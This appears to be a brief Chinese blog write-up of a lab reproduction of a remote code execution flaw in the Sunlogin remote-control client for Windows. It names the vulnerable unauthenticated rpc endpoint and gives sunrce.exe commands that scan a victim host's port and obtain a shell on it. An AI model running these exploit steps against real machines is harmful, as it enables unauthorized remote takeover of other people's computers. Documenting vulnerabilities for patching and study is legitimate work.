漏洞简介

向日葵个人版企业版均受影响 for Windows <=11.0.0.33

SunloginClient 启动后会在 40000 以上随机开放一个web端口，认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce
测试向日葵客户端漏洞版本:11.0.0.33826

复现过程

环境说明

攻击机:192.168.0.23(Window10)
目标机:192.168.0.24(windows2012)

测试向日葵客户端漏洞版本:11.0.0.33826

image.png

向日葵漏洞扫描工具下载地址

扫描受害机漏洞端口

sunrce.exe -h 192.168.0.24 -ps -shell

image.png

获取受害机shell

sunrce.exe -h 192.168.0.24 -ps 49341 -shell

image.png

漏洞修复

厂商已发布了漏洞修复程序，请及时关注更新

原创不易，转载请注明出处
原文链接：https://qu1u1.cn/archives/%E5%90%91%E6%97%A5%E8%91%B5%E8%BF%9C%E6%8E%A7%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%B7%A5%E5%85%B7